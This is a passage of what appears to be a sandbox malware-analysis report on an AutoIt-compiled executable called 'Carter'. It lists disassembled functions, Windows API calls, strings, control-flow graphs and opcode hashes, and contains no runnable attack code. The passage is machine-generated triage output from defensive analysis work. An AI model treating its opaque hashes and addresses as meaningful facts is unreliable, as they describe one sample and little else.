                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: c35a007e2c95bc1bfd4fe89e16077f84835f7cdd7aa35d2e0f0924e502d66da2
                                                                            • Instruction ID: 870e950a83af53b4619b2843336841b33a23f8b5aa09de414cbdc92d83ca8a00
                                                                            • Opcode Fuzzy Hash: c35a007e2c95bc1bfd4fe89e16077f84835f7cdd7aa35d2e0f0924e502d66da2
                                                                            • Instruction Fuzzy Hash: E251EC306646119FCB21EF21CC49B2AB7E4EF49714F048529F999DB2A1DB70ED20CF42
                                                                            Function 00284D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 980 284d83-284dd1 982 284e31-284e33 980->982 983 284dd3-284dd6 980->983 982->983 986 284e35 982->986 984 284dd8-284ddf 983->984 985 284e37 983->985 987 284ead-284eb5 PostQuitMessage 984->987 988 284de5-284dea 984->988 990 284e3d-284e40 985->990 991 2c09c2-2c09f0 call 27c460 call 27c483 985->991 989 284e1a-284e22 DefWindowProcW 986->989 998 284e61-284e63 987->998 994 284df0-284df2 988->994 995 2c0a35-2c0a49 call 2d2cce 988->995 997 284e28-284e2e 989->997 992 284e42-284e43 990->992 993 284e65-284e8c SetTimer RegisterWindowMessageW 990->993 1027 2c09f5-2c09fc 991->1027 999 284e49-284e5c KillTimer call 285ac3 call 2734e4 992->999 1000 2c0965-2c0968 992->1000 993->998 1001 284e8e-284e99 CreatePopupMenu 993->1001 1002 284df8-284dfd 994->1002 1003 284eb7-284ec1 call 285b29 994->1003 995->998 1020 2c0a4f 995->1020 998->997 999->998 1006 2c099e-2c09bd MoveWindow 1000->1006 1007 2c096a-2c096c 1000->1007 1001->998 1009 2c0a1a-2c0a21 1002->1009 1010 284e03-284e08 1002->1010 1022 284ec6 1003->1022 1006->998 1014 2c098d-2c0999 SetFocus 1007->1014 1015 2c096e-2c0971 1007->1015 1009->989 1017 2c0a27-2c0a30 call 2c8854 1009->1017 1018 284e9b-284eab call 285bd7 1010->1018 1019 284e0e-284e14 1010->1019 1014->998 1015->1019 1023 2c0977-2c0988 call 27c460 1015->1023 1017->989 1018->998 1019->989 1019->1027 1020->989 1022->998 1023->998 1027->989 1031 2c0a02-2c0a15 call 285ac3 call 2859d3 1027->1031 1031->989
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00284E22
                                                                            • KillTimer.USER32(?,00000001), ref: 00284E4C
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00284E6F
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00284E7A
                                                                            • CreatePopupMenu.USER32 ref: 00284E8E
                                                                            • PostQuitMessage.USER32(00000000), ref: 00284EAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: efe273954a3ec6fd6f70fdd713875f160d7f2b0bb216f7a78c52907b649bc3e7
                                                                            • Instruction ID: 592f737e9c94abad2307b07b9ba3ba42b3559257410d958d2dcc7824863d7a3e
                                                                            • Opcode Fuzzy Hash: efe273954a3ec6fd6f70fdd713875f160d7f2b0bb216f7a78c52907b649bc3e7
                                                                            • Instruction Fuzzy Hash: B741197923620BABDB3A7F68DC89B7A3699F741301F00061AF501D11E2CBB49C70D761
                                                                            Function 002856F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C0C5B
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _memset.LIBCMT ref: 00285787
                                                                            • _wcscpy.LIBCMT ref: 002857DB
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002857EB
                                                                            • __swprintf.LIBCMT ref: 002C0CD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                            • String ID: Line %d: $AutoIt - $E#E#
                                                                            • API String ID: 230667853-1317277412
                                                                            • Opcode ID: 66255e1b2805d25a42fc124aa3d3b4e4d88efd99c464f92390a52313be39dbf4
                                                                            • Instruction ID: 979f4b87deaabb29a5d2f27bc1124d569dd06c51bcf36b8d0714fa078eeb979e
                                                                            • Opcode Fuzzy Hash: 66255e1b2805d25a42fc124aa3d3b4e4d88efd99c464f92390a52313be39dbf4
                                                                            • Instruction Fuzzy Hash: 8341B57102A311AAD321FB60DC85FDFB7DCAF44350F004A1EF585920E1DB70A669CB56
                                                                            Function 0027AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002907EC
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002907F4
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002907FF
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0029080A
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00290812
                                                                              • Part of subcall function 002907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0029081A
                                                                              • Part of subcall function 0028FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0027AC6B), ref: 0028FFA7
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0027AD08
                                                                            • OleInitialize.OLE32(00000000), ref: 0027AD85
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002B2F56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID: <w3$\t3$s3
                                                                            • API String ID: 1986988660-356518367
                                                                            • Opcode ID: 2e40fd0335e04bf208d74384df5045d74dcd0edca418b7bde7895de9f659cfb8
                                                                            • Instruction ID: 9fdbed3c90d7b0eb7e992f42bb268b4c8e84c3ada135c4511657ce82facaa95b
                                                                            • Opcode Fuzzy Hash: 2e40fd0335e04bf208d74384df5045d74dcd0edca418b7bde7895de9f659cfb8
                                                                            • Instruction Fuzzy Hash: B781DBF89192448ED3BBEF2AADD52657FECEB59314F00816AE418C72B2EB306415DF50
                                                                            Function 002850DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1315 2850db-28514b CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00285109
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0028512A
                                                                            • ShowWindow.USER32(00000000), ref: 0028513E
                                                                            • ShowWindow.USER32(00000000), ref: 00285147
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 3e425c7a13e4944ac2693a78a296fc3258b75d8d8343b11b2d9472d1443a5415
                                                                            • Instruction ID: 91a4d17d05771b2c85ee76af2f2b0640ce127efb2072b8c3eceffbb3b6a603ab
                                                                            • Opcode Fuzzy Hash: 3e425c7a13e4944ac2693a78a296fc3258b75d8d8343b11b2d9472d1443a5415
                                                                            • Instruction Fuzzy Hash: E9F0DAB16452947EEA73172BAC98F772E7DD7C6F60F00051AB900E21B1CA651851DAB0
                                                                            Function 002D9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1316 2d9b16-2d9b9b call 284a8c call 2d9cf1 1321 2d9b9d 1316->1321 1322 2d9ba5-2d9c31 call 284ab2 * 4 call 284a8c call 29593c * 2 call 284ab2 1316->1322 1323 2d9b9f-2d9ba0 1321->1323 1340 2d9c36-2d9c5c call 2d96c4 call 2d8f0e 1322->1340 1325 2d9ce8-2d9cee 1323->1325 1345 2d9c5e-2d9c6e call 292f85 * 2 1340->1345 1346 2d9c73-2d9c77 1340->1346 1345->1323 1348 2d9c79-2d9cd6 call 2d90c1 call 292f85 1346->1348 1349 2d9cd8-2d9cde call 292f85 1346->1349 1356 2d9ce0-2d9ce6 1348->1356 1349->1356 1356->1325
                                                                            APIs
                                                                              • Part of subcall function 00284A8C: _fseek.LIBCMT ref: 00284AA4
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DE1
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DF4
                                                                            • _free.LIBCMT ref: 002D9C5F
                                                                            • _free.LIBCMT ref: 002D9C66
                                                                            • _free.LIBCMT ref: 002D9CD1
                                                                              • Part of subcall function 00292F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292F99
                                                                              • Part of subcall function 00292F85: GetLastError.KERNEL32(00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292FAB
                                                                            • _free.LIBCMT ref: 002D9CD9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                            • API String ID: 1552873950-2806939583
                                                                            • Opcode ID: efd58b78825c51bee218a88d1fc1416342d6ab64515e348a60f4a4119548d964
                                                                            • Instruction ID: 4a93d9c74390e8f7be6339ed6f64129e8bc47ab669e8c246505e92c1e9cfd485
                                                                            • Opcode Fuzzy Hash: efd58b78825c51bee218a88d1fc1416342d6ab64515e348a60f4a4119548d964
                                                                            • Instruction Fuzzy Hash: 5D513CB1924219AFDF24EF64DC41A9EBBB9FF48304F10009EB249A7381DB715E948F58
                                                                            Function 0029563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1559183368-0
                                                                            • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                            • Instruction ID: eb1cb1bf2ee01d78c292c0f408d7bcd32316bfa70e075a00c97f52a2779d73cf
                                                                            • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                            • Instruction Fuzzy Hash: D551A930B20B16DBDF259FA9C8806AEB7A5AF41320F24872DF835962D0D7709E719F40
                                                                            Function 002752B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0027534A
                                                                            • TranslateMessage.USER32(?), ref: 00275356
                                                                            • DispatchMessageW.USER32(?), ref: 00275360
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID:
                                                                            • API String ID: 1795658109-0
                                                                            • Opcode ID: 81d7cc7ee84b04e3003960f9cb2dfed84f6063bd7b62343d75fa4df369ae1860
                                                                            • Instruction ID: 9e769b7b1d3fc338ed719fe94e5cebc5aba875757c0ed17c34acd18bdfa55466
                                                                            • Opcode Fuzzy Hash: 81d7cc7ee84b04e3003960f9cb2dfed84f6063bd7b62343d75fa4df369ae1860
                                                                            • Instruction Fuzzy Hash: F5310A70528B169FDB318F64DC84BBAB7EC9B01340F14809AE41AC75F1D7F59455D711
                                                                            Function 00271284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712A8
                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712C9
                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00271275,SwapMouseButtons,00000004,?), ref: 002712EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: cedc41d1d7064f425630006624201a3cbcf13fdf0793f175888fc91d25da06b4
                                                                            • Instruction ID: 5ac055e2926275e66a6183a3746b0a815c5ec8d83e2aba4c1555f27136420f48
                                                                            • Opcode Fuzzy Hash: cedc41d1d7064f425630006624201a3cbcf13fdf0793f175888fc91d25da06b4
                                                                            • Instruction Fuzzy Hash: F4115A71921218BFDB218FA8DC84EEEBBBCEF05740F00855AF809D7110D7719E6497A0
                                                                            Function 00290FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0029593C: __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029593C: __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029593C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            • std::exception::exception.LIBCMT ref: 0029101C
                                                                            • __CxxThrowException@8.LIBCMT ref: 00291031
                                                                              • Part of subcall function 002987CB: RaiseException.KERNEL32(?,?,?,0032CAF8,?,?,?,?,?,00291036,?,0032CAF8,?,00000001), ref: 00298820
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID: `=0$h=0
                                                                            • API String ID: 3902256705-716891533
                                                                            • Opcode ID: 0b228830493a25531d6a803078f3c86f3a82a28e831a44c5489f597a084db6e9
                                                                            • Instruction ID: 93962dfe18eef4e37d03dd1c156cab3b557b6446fefa18af471eaf48918ffc15
                                                                            • Opcode Fuzzy Hash: 0b228830493a25531d6a803078f3c86f3a82a28e831a44c5489f597a084db6e9
                                                                            • Instruction Fuzzy Hash: 4DF0C83956421EA6DF21BE99EC159DEBBAC9F01310F100469FD14966D1DFB18BB0CAE0
                                                                            Function 002D3F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00302C4C), ref: 002D3F57
                                                                            • GetLastError.KERNEL32 ref: 002D3F66
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002D3F75
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00302C4C), ref: 002D3FD2
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 91d88752b027c9cdad125f6a7bf358941e1a11af8741f64e655e6e7ef3a51ee1
                                                                            • Instruction ID: 5a686972edaae4b56053298b8e5bbf5d0f2aa46c91d66d30bff6dccc18048ab9
                                                                            • Opcode Fuzzy Hash: 91d88752b027c9cdad125f6a7bf358941e1a11af8741f64e655e6e7ef3a51ee1
                                                                            • Instruction Fuzzy Hash: A921D07492A2059FC300EF28D8818AAB7F8AE45364F104A1AF495C37E1D7308E2ACB43
                                                                            Function 00285B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285B58
                                                                              • Part of subcall function 002856F8: _memset.LIBCMT ref: 00285787
                                                                              • Part of subcall function 002856F8: _wcscpy.LIBCMT ref: 002857DB
                                                                              • Part of subcall function 002856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002857EB
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00285BAD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00285BBC
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002C0D7C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: 6deec097e3c18eb70aec7e824447567f62717193be7624798605134360b5f87d
                                                                            • Instruction ID: e9ff1945ca6416b375478b61609911163372d7d86b765d607521f0100be119c0
                                                                            • Opcode Fuzzy Hash: 6deec097e3c18eb70aec7e824447567f62717193be7624798605134360b5f87d
                                                                            • Instruction Fuzzy Hash: 88213774515794AFEB739B64C8D5FEBBBECEF11308F00058DE68A56181C3742A94CB41
                                                                            Function 0028278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002827AF,?,00000001), ref: 002849F4
                                                                            • _free.LIBCMT ref: 002BFB04
                                                                            • _free.LIBCMT ref: 002BFB4B
                                                                              • Part of subcall function 002829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00282ADF
                                                                            Strings
                                                                            • Bad directive syntax error, xrefs: 002BFB33
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: Bad directive syntax error
                                                                            • API String ID: 2861923089-2118420937
                                                                            • Opcode ID: 09b38b3f5795ba9463d5a7970a318f4ef8255ce3cba17226eb9507a527b0b3c1
                                                                            • Instruction ID: 070355faddac4e7e86e57210ea30e07ac8b05a93e9ac7bed723e1f36a51d2e83
                                                                            • Opcode Fuzzy Hash: 09b38b3f5795ba9463d5a7970a318f4ef8255ce3cba17226eb9507a527b0b3c1
                                                                            • Instruction Fuzzy Hash: 12917F7592021AAFCF08EFA4CD919EDB7B4BF04350F14452AF815AB2A1EB709E25CF50
                                                                            Function 002848B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
